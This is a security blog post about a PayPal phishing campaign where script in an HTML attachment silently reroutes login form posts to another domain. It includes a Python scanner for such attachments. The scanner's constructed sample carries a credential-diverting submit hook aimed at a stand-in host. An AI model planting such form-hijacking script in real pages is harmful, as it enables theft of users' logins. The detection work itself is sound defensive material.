Advanced phishing tactics used to steal PayPal credentials

Phishers are back to using an old tactic in a new fashion to get hold of their victims’ credentials.

One of the first lessons you will learn during anti-phishing training is to hover over the links in a mail to see if they point to the site where you would expect them to point. Although that is good advice, it is NOT a guarantee that you are going to be safe.

Always visit sites directly, never follow the URLs presented to you in emails or attachments.

Phishing definition

Per Wikipedia:

Phishing is the attempt to acquire sensitive information such as usernames, passwords, and credit card details (and sometimes, indirectly, money), often for malicious reasons, by masquerading as a trustworthy entity in an electronic communication.

What does this phish do?

As reported by UK malware researcher @dvk01uk, the phishers are using JavaScript to send the user to the promised PayPal site while the login credentials are being sent to an entirely different domain.

The JavaScript runs as soon as the page (an HTML attachment) is loaded; it intercepts every form post destined for PayPal.com and diverts it to the actual phishing page, which collects all your details if you are unwise enough to fall for the trick.

In this case, the phish was pointing to PayPal and the phishing page is www[dot]egypt-trips[dot]co, which appears to be an unused WordPress site. (We have informed the registrant of the phish, so we hope they will take appropriate measures.)
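As an added example (not code from the original post or the linked write-up), here is a Python scan a mail gateway or analyst could run over an HTML attachment to flag the combination described above: a visible form that posts to paypal.com, paired with inline script that hooks the submit and references some other host. The sample attachment, the collector.example host and the regex heuristics are constructed for illustration and are not the real phish.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

URL_RE = re.compile(r"""https?://[^\s'"<>)]+""", re.I)
# Constructs that let inline script change where the browser posts a form.
SUBMIT_HOOK_RE = re.compile(r"""\.action\s*=|onsubmit|addEventListener\(\s*['"]submit""", re.I)


class AttachmentScanner(HTMLParser):
    """Collect every <form action> and all inline <script> text from an HTML attachment."""
    def __init__(self):
        super().__init__()
        self.form_actions, self.script_text, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.form_actions.append(dict(attrs).get("action") or "")
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.script_text.append(data)


def registered_domain(host):
    # 'www.paypal.com' -> 'paypal.com'; a crude cut that is good enough for brand matching.
    parts = (host or "").lower().split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else ""


def find_diverted_posts(html, trusted_domain="paypal.com"):
    """Foreign domains referenced by submit-hooking script in an attachment whose visible
    form posts to the trusted brand; [] when either half of the trick is missing."""
    p = AttachmentScanner()
    p.feed(html)
    if not any(registered_domain(urlparse(a).hostname) == trusted_domain for a in p.form_actions):
        return []
    script = "\n".join(p.script_text)
    if not SUBMIT_HOOK_RE.search(script):
        return []
    foreign = {registered_domain(urlparse(u).hostname) for u in URL_RE.findall(script)}
    return sorted(d for d in foreign if d and d != trusted_domain)


# Constructed sample (not the real phish): the form shows PayPal, the script swaps the target.
SAMPLE_ATTACHMENT = """<html><body>
<form id="login" method="post" action="https://www.paypal.com/signin">
  <input name="email"><input name="password" type="password"></form>
<script>document.getElementById('login').onsubmit = function () {
  this.action = 'https://collector.example/post.php'; };</script>
</body></html>"""
```

Hovering over the link in such an attachment still shows paypal.com, which is exactly why the scan looks at the script rather than the form alone.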

Blocked

While giving the site owner some time to clean up his site, users of Malwarebytes Anti-Malware Premium will find that the phishing page is blocked if they have the Malicious Website Protection enabled.


Link

The original blogpost about this particular phish, including screenshots and code snippets, can be found here: Very unusual PayPal phishing attack

Pieter Arntz